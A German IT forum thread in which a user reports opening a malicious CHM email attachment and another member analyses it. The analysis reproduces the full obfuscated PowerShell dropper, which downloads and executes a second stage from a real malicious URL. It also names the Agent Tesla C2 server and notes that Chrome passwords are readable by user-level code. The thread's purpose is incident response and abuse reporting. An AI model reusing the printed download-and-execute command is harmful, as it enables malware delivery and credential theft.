29
Ich habe (höchstwahrscheinlich) einen Virus geöffnet
Hallo zusammen
Tja was soll ich sagen, ich bin gerade eben zu einer der Personen geworden über die ich mich normalerweise lustig mache.
Diese datei habe ich soeben in einem Email Anhang geöffnet (auf meinem privaten PC) https://www.virustotal.com/gui/file/e268f2982e14d363e7f7874696d231701234 ...
Daraufhin hat sich ein leeres Hilfe Fenster geöffnet denn es handelte sich um eine Compiled HTML Help Datei. Dieses Fenster war allerdings leer.
Zu diesem Zeitpunkt war auf meinem win11 Rechner der defender mit allen Sicherheitsfunktionen inkl cloud Schutz aktiv. Die Mail ging vorher auch noch durchs sophos gateway inkl sandbox. Keinerlei Warnungen.
Daraufhin habe ich den PC vom Netzwerk getrennt, einen defender offline scan durchlaufen lassen, per process Explorer und autoruns nach verdächtigen Prozessen gesucht. Alles ohne Ergebnis.
Was meint ihr? Sollte ich den PC einfach abschießen und neu aufsetzen?
Tja was soll ich sagen, ich bin gerade eben zu einer der Personen geworden über die ich mich normalerweise lustig mache.
Diese datei habe ich soeben in einem Email Anhang geöffnet (auf meinem privaten PC) https://www.virustotal.com/gui/file/e268f2982e14d363e7f7874696d231701234 ...
Daraufhin hat sich ein leeres Hilfe Fenster geöffnet denn es handelte sich um eine Compiled HTML Help Datei. Dieses Fenster war allerdings leer.
Zu diesem Zeitpunkt war auf meinem win11 Rechner der defender mit allen Sicherheitsfunktionen inkl cloud Schutz aktiv. Die Mail ging vorher auch noch durchs sophos gateway inkl sandbox. Keinerlei Warnungen.
Daraufhin habe ich den PC vom Netzwerk getrennt, einen defender offline scan durchlaufen lassen, per process Explorer und autoruns nach verdächtigen Prozessen gesucht. Alles ohne Ergebnis.
Was meint ihr? Sollte ich den PC einfach abschießen und neu aufsetzen?
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 4313031295
Url: https://administrator.de/contentid/4313031295
Printed on: April 27, 2024 at 21:04 o'clock
29 Comments
Latest comment
Wenn ich mir anschaue was die Sandbox ausspuckt, definitiv sofort neu installieren, sieht sehr verdächtig aus was da gedropped bzw an Powershell Befehlen ausgeführt wurde....
Hast du Admin Rechte mit den Benutzer, mit dem du angemeldet bist?
Hi.
+1 Neu installieren.
Gegebenenfalls den Rest des Netzwerks auch mal durchstöbern, ob in Freigaben und den angegebenen Pfaden auch solche Dateien "gewachsen" sind.
Gruß
Marc
+1 Neu installieren.
Gegebenenfalls den Rest des Netzwerks auch mal durchstöbern, ob in Freigaben und den angegebenen Pfaden auch solche Dateien "gewachsen" sind.
Gruß
Marc
format c:
Hier mal ein breakdown was auf deinem System geschehen ist. Die Hilfedatei hat folgenden Prozess gestartet:
Hier Schritt für Schritt:
$t0 wird hier als iex gespeichert, welches ein Alias für Invoke-Expression ist
sal ist ein Alias für Set-Alias, also wird P als Alias für $t0 festgelegt, $t0 wurde vorhin als Invoke-Expression festgelegt
D.H.: Alles was in P gepiped wird, wird nun mit Invoke-Expression ausgeführt.
Keine Fehlermeldungen ausgeben und still weitermachen
Der Variable $t56fg ist nun das Sicherheitsprotokoll TLS1.2 zugewiesen
Das aktuelle Sicherheitsprotokoll der Sitzung wird auf $t56fg (TLS1.2) festgelegt
VisualBasic Assembly wird in den Alias P (Invoke-Expression) gepiped und somit geladen
Pinge google bis der ping erfolgreich ist
ein Webclient wird erstellt und in $tty gespeichert
Die Datei der angegebenen URL wird geladen und in den Alias P (Invoke-Expression) gepiped und somit ausgeführt.
Soweit ich beurteilen kann, ist die Datei nicht erreichbar.
EDIT: Doch die Datei ist erreichbar. Den Inhalt analysiere ich gerade, er ist obfuskiert.
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://meyeks.com.tr/hala.txt')|P Hier Schritt für Schritt:
$t0='DE5'.replace('D','I').replace('5','x') sal P $t0D.H.: Alles was in P gepiped wird, wird nun mit Invoke-Expression ausgeführt.
$ErrorActionPreference = 'SilentlyContinue'; $t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P; do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P; $mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://meyeks.com.tr/hala.txt')|P Die Datei der angegebenen URL wird geladen und in den Alias P (Invoke-Expression) gepiped und somit ausgeführt.
Soweit ich beurteilen kann, ist die Datei nicht erreichbar.
EDIT: Doch die Datei ist erreichbar. Den Inhalt analysiere ich gerade, er ist obfuskiert.
9
Lieber @chaot1coz besten Dank für diese große Hilfe, damit ist klar dass ich den PC abschießen muss. Was jetzt katastrophal wäre wenn bspw Passwörter aus Chrome ausgelesen werden - kannst du das irgendwie nachvollziehen? Ich habe vom anklicken der Datei bis zum Trennen des Netzwerks ca 2 Minuten gebraucht - ich weiß, ich habe mich unendlich dumm angestellt.
im Moment kann ich das nicht nachvollziehen. Die Stage 2 ist ziemlich stark obfuskiert. Es scheint als würde eine MSBuild.exe irgendwo hingeschrieben, was diese macht kann ich noch nicht sagen.
Schon auch krass wie nutzlos die ganzen tollen KI-basierten Echtzeitscanner und Sandboxen sind zumal die genannte Domain schon 2020 mit Viren in Verbindung stand. https://www.virustotal.com/gui/domain/meyeks.com.tr/relations
Klar habe ich mich dumm angestellt aber dass man sich darauf so gar nicht verlassen kann ist schon beunruhigend
Klar habe ich mich dumm angestellt aber dass man sich darauf so gar nicht verlassen kann ist schon beunruhigend
2
Chrome? Warum hast du Passwörter im Browser? Zumindest im Firefox kann man sie in Klartext auslesen. Hole dir Bitwarden.
Ich bin jetzt glaube ich keine große Ausnahme wenn es um das Speichern von (persönlichen) Passwörtern via Chrome geht aber du hast natürlich völlig recht, eigentlich sollte man es anders lösen. Die wichtigen Logins sind nochmal zusätzlich via 2fa gesichert und Bitwarden werde ich mir mal ansehen.
Mit einem Apple Mac kann man mal wieder nur leise schmunzeln bei sowas und bestätigt die OS Entscheidung einmal mehr!! 
3Zitat von @aqui:
Mit einem Apple Mac kann man mal wieder nur leise schmunzeln bei sowas und bestätigt die OS Entscheidung einmal mehr!!
Mit einem Apple Mac kann man mal wieder nur leise schmunzeln bei sowas und bestätigt die OS Entscheidung einmal mehr!!
Danke für deinen wertvollen Beitrag zu diesem Thema.
6
Die Absender Adresse und insbesondere der Name des Absenders war legitim und ähnelte stark einem unserer Kunden. Die Bezeichnung des Anhangs war ebenfalls legitim nur eben das Dateiformat nicht was mir zu spät aufgefallen ist. Klar war es dumm aber es ist schon wirklich gut gemacht insbesondere da alle möglichen sicherheitsmechanismen ausgehebelt wurden. Es handelt sich ja nicht um eine komplexe phishing Attacke
1
Immer schön draufhaun, damit die Leute künftig aus Angst hier auch noch vorgeführt zu werden lieber die Mail löschen und tun als wär nix gewesen...
Da krieg ich Blutdruck, bei solchem Verhalten! Noch mehr, wenn es von Profis kommt!
Ich finds super von @Frank84, dass er das hier so offen anspricht.
Vielen Dank auch an @chaot1coz für das Aufdröseln, was dabei genau passiert ist, das bringt sicher ganz vielen einen neuen Einblick in solche Dateien und was dabei eigentlich abläuft.
Da krieg ich Blutdruck, bei solchem Verhalten! Noch mehr, wenn es von Profis kommt!
Ich finds super von @Frank84, dass er das hier so offen anspricht.
Vielen Dank auch an @chaot1coz für das Aufdröseln, was dabei genau passiert ist, das bringt sicher ganz vielen einen neuen Einblick in solche Dateien und was dabei eigentlich abläuft.
Zitat von @Drohnald:
Immer schön draufhaun, damit die Leute künftig aus Angst hier auch noch vorgeführt zu werden lieber die Mail löschen und tun als wär nix gewesen...
Da krieg ich Blutdruck, bei solchem Verhalten! Noch mehr, wenn es von Profis kommt!
Ich finds super von @Frank84, dass er das hier so offen anspricht.
Vielen Dank auch an @chaot1coz für das Aufdröseln, was dabei genau passiert ist, das bringt sicher ganz vielen einen neuen Einblick in solche Dateien und was dabei eigentlich abläuft.
Immer schön draufhaun, damit die Leute künftig aus Angst hier auch noch vorgeführt zu werden lieber die Mail löschen und tun als wär nix gewesen...
Da krieg ich Blutdruck, bei solchem Verhalten! Noch mehr, wenn es von Profis kommt!
Ich finds super von @Frank84, dass er das hier so offen anspricht.
Vielen Dank auch an @chaot1coz für das Aufdröseln, was dabei genau passiert ist, das bringt sicher ganz vielen einen neuen Einblick in solche Dateien und was dabei eigentlich abläuft.
Dem schließ ich mich voll und ganz an!
So, so gehts weiter:
die Datei, die geladen wird ist ein weiteres Powershell-Skript, welches eine DLL enthält, die dynamisch in den Prozess MSBuild.exe geladen wird. Diese DLL ist der Trojaner "Agent Tesla" und verbindet sich mit dem Command&Control-Server ftp.logistor.hu (185.33.54.2) und erwartet dann von diesem Befehle. Bei meinen Tests kamen bisher keine Befehle an.
die Datei, die geladen wird ist ein weiteres Powershell-Skript, welches eine DLL enthält, die dynamisch in den Prozess MSBuild.exe geladen wird. Diese DLL ist der Trojaner "Agent Tesla" und verbindet sich mit dem Command&Control-Server ftp.logistor.hu (185.33.54.2) und erwartet dann von diesem Befehle. Bei meinen Tests kamen bisher keine Befehle an.
Wenn man ein bisschen tiefer gräbt, findet man heraus, dass der Trojaner sich mit einem mit Zugangsdaten gesichertem FTP-Server verbindet:
Schaut man sich dort um, findet man jede Menge .html Dateien:
Und dort findet man dann vermutlich die gestohlenen Passwörter...
Schaut man sich dort um, findet man jede Menge .html Dateien:
Und dort findet man dann vermutlich die gestohlenen Passwörter...
Zitat von @chaot1coz:
So, so gehts weiter:
die Datei, die geladen wird ist ein weiteres Powershell-Skript, welches eine DLL enthält, die dynamisch in den Prozess MSBuild.exe geladen wird. Diese DLL ist der Trojaner "Agent Tesla" und verbindet sich mit dem Command&Control-Server ftp.logistor.hu (185.33.54.2) und erwartet dann von diesem Befehle. Bei meinen Tests kamen bisher keine Befehle an.
So, so gehts weiter:
die Datei, die geladen wird ist ein weiteres Powershell-Skript, welches eine DLL enthält, die dynamisch in den Prozess MSBuild.exe geladen wird. Diese DLL ist der Trojaner "Agent Tesla" und verbindet sich mit dem Command&Control-Server ftp.logistor.hu (185.33.54.2) und erwartet dann von diesem Befehle. Bei meinen Tests kamen bisher keine Befehle an.
Ich hoffe dass ich eines Tages auch so fähig bin wie du - kannst du mir verraten welche Tools du verwendest?
Da das alles ein recht langwieriger Prozess zu sein scheint, kann ich glaube ich recht entspannt sein, da ich das Netzwerkkabel zeitnah gezogen habe.
Noch ein paar Bemerkungen von mir:
Ich habe die Datei direkt nach dem öffnen auf Virustotal hochgeladen. Der letzte Scan lag zu diesem Zeitpunkt 30m in der Vergangenheit. Es gab 6/61 Erkennungen - eine davon war "Microsoft" ich weiß zwar nicht welche Engine hier verwendet wird, finde es aber sehr verwunderlich dass mein Defender mit aktiviertem "Cloudschutz" nicht angeschlagen hat.
Von sophos wird explizit empfohlen die vorgefertigten Listen für blockierte Dateitypen im Anhang zu verwenden - was wir auch getan haben. Offensichtlich sind diese Listen ungenügend. Ich werde nun also selbst eine deutlich längere Liste anlegen. Viel lieber wäre mir eine whitelist d.h. nur Dateityp xy darf ungescholten durch alles andere kommt erstmal in die Quarantäne - anscheinend gibt es dafür bei Sophos Central aber keine Möglichkeit. Besten Dank auch. Das gleiche gilt für den Sandbox basierten Scan (der für die besagte Datei übrigens 20m lief - natürlich ohne Erkennung).
Grundsätzlich haben mir all diese nutzlosen Sicherheitsfeatures ein falsches Gefühl der Sicherheit vermittelt. Der ganze Buzzwort Karneval (KI GESTÜTZTER CLOUDBASIERTER SCHUTZ etc) muss ausgeblendet werden und man muss sich darüber im Klaren sein, dass all diese Funktionen in der Realität das bare minimum an Sicherheit bieten.
Windows 11 lässt sich nicht mehr ohne Login beim Microsoft Account installieren -> kein Internet -> keine Installation. Gibt bestimmt registry hacks aber trotzdem WTF
Tools: Texteditor (Sublime),VS Code, Hyper-V, Wireshark.
Wenn du mir sagst wie dein PC heißt (PN), kann ich dir sagen ob etwas davon hochgeladen wurde.
Wenn du mir sagst wie dein PC heißt (PN), kann ich dir sagen ob etwas davon hochgeladen wurde.
Zitat von @chaot1coz:
Wenn man ein bisschen tiefer gräbt, findet man heraus, dass der Trojaner sich mit einem mit Zugangsdaten gesichertem FTP-Server verbindet:
Schaut man sich dort um, findet man jede Menge .html Dateien:
Und dort findet man dann vermutlich die gestohlenen Passwörter...
Wenn man ein bisschen tiefer gräbt, findet man heraus, dass der Trojaner sich mit einem mit Zugangsdaten gesichertem FTP-Server verbindet:
Schaut man sich dort um, findet man jede Menge .html Dateien:
Und dort findet man dann vermutlich die gestohlenen Passwörter...
Konntest du feststellen zu welchem Zeitpunkt sich der Trojaner mit dem FTP Server verbindet?
Bei mir etwa 30 Sekunden nach Start des PS-Skriptes. Ich weiß allerdings nicht, wie viel Zeit vom Öffnen der chm-Datei bis dahin vergeht.
Fazit: Ende gut alles gut, mein PC war nicht enthalten. Ich hoffe dass dank meiner Dummheit hier einige etwas lernen konnten.
Ein riesen Dankeschön an @chaot1coz, der mit seiner bewundernswerten Fachkompetenz alles aufklären konnte.
An der Stelle möchte ich auch nochmal erwähnen: selbst jetzt, knapp 12 Stunden nach dem erstmaligen Upload auf Virustotal, erkennen nur 8 von 61 engines einen Virus
Ein riesen Dankeschön an @chaot1coz, der mit seiner bewundernswerten Fachkompetenz alles aufklären konnte.
An der Stelle möchte ich auch nochmal erwähnen: selbst jetzt, knapp 12 Stunden nach dem erstmaligen Upload auf Virustotal, erkennen nur 8 von 61 engines einen Virus
1
Danke für das Lob. Ich habe den Abuse direkt gemeldet und innerhalb kurzer Zeit eine Antwort bekommen:
Und tatsächlich liefert https://meyeks.com.tr/hala.txt jetzt nur noch einen 404!
Sehr vorbildlicher Hoster, so schnell habe ich noch nie eine Antwort auf sowas bekommen!
Damit ist die Malware (fürs Erste) unscharf 👍🏻
Und tatsächlich liefert https://meyeks.com.tr/hala.txt jetzt nur noch einen 404!
Sehr vorbildlicher Hoster, so schnell habe ich noch nie eine Antwort auf sowas bekommen!
Damit ist die Malware (fürs Erste) unscharf 👍🏻
5
Damit hast du jetzt wahrscheinlich hunderten/tausenden (?) Menschen den Arsch gerettet.
Und damit wir hier vielleicht noch etwas mehr lernen können: konntest du feststellen ob die Passwörter tatsächlich aus den Browsern ausgelesen wurden? Denn es ist ja leider glaube ich wirklich so, dass die meisten Browser die Passwörter unverschlüsselt lokal zwischenspeichern. Würden hier Manager wie Bitwarden Abhilfe schaffen?
Und damit wir hier vielleicht noch etwas mehr lernen können: konntest du feststellen ob die Passwörter tatsächlich aus den Browsern ausgelesen wurden? Denn es ist ja leider glaube ich wirklich so, dass die meisten Browser die Passwörter unverschlüsselt lokal zwischenspeichern. Würden hier Manager wie Bitwarden Abhilfe schaffen?
Etwas mehr Info:
Chrome nutzt die Microsoft Data Protection API (DPAPI): "The windows crypt protect API is locked to the user account. But any app you run under that account can decrypt it."
Sobald Malware also im entsprechenden Nutzerkontext ausgeführt wird, sind alle in Chrome gespeicherten Passwörter auslesbar.
Im Gegensatz dazu speichert die Bitwarden Chrome Extension zwar auch lokal eine Json Datei zwischen, diese ist aber per Master-Passwort vershclüsselt und lässt sich nicht auslesen.
Firefox bietet im Gegensatz zu Chrome ebenfalls die Möglichkeit ein Master-Passwort zu verwenden.
Chrome nutzt die Microsoft Data Protection API (DPAPI): "The windows crypt protect API is locked to the user account. But any app you run under that account can decrypt it."
Sobald Malware also im entsprechenden Nutzerkontext ausgeführt wird, sind alle in Chrome gespeicherten Passwörter auslesbar.
Im Gegensatz dazu speichert die Bitwarden Chrome Extension zwar auch lokal eine Json Datei zwischen, diese ist aber per Master-Passwort vershclüsselt und lässt sich nicht auslesen.
Firefox bietet im Gegensatz zu Chrome ebenfalls die Möglichkeit ein Master-Passwort zu verwenden.
@chaot1coz
Leider ist die Datei wieder erreichbar....
Leider ist die Datei wieder erreichbar....
Ich habe es nochmal gemeldet
Zitat von @Frank84:
Damit hast du jetzt wahrscheinlich hunderten/tausenden (?) Menschen den Arsch gerettet.
Und damit wir hier vielleicht noch etwas mehr lernen können: konntest du feststellen ob die Passwörter tatsächlich aus den Browsern ausgelesen wurden? Denn es ist ja leider glaube ich wirklich so, dass die meisten Browser die Passwörter unverschlüsselt lokal zwischenspeichern. Würden hier Manager wie Bitwarden Abhilfe schaffen?
Damit hast du jetzt wahrscheinlich hunderten/tausenden (?) Menschen den Arsch gerettet.
Und damit wir hier vielleicht noch etwas mehr lernen können: konntest du feststellen ob die Passwörter tatsächlich aus den Browsern ausgelesen wurden? Denn es ist ja leider glaube ich wirklich so, dass die meisten Browser die Passwörter unverschlüsselt lokal zwischenspeichern. Würden hier Manager wie Bitwarden Abhilfe schaffen?
Zu dem Inhalt der Dateien kann ich nichts sagen. Üblicherweise sind es aber ausgelesene Passwörter aus den gängigen Browsern und anderen Programmen.
1
Es wurde wieder gesperrt. Hoffentlich nun dauerhaft.
4
Saustarke Analyse von chaot1coz.
Besten Dank für den Beitrag, ich habe viel gelernt!
Besten Dank für den Beitrag, ich habe viel gelernt!
2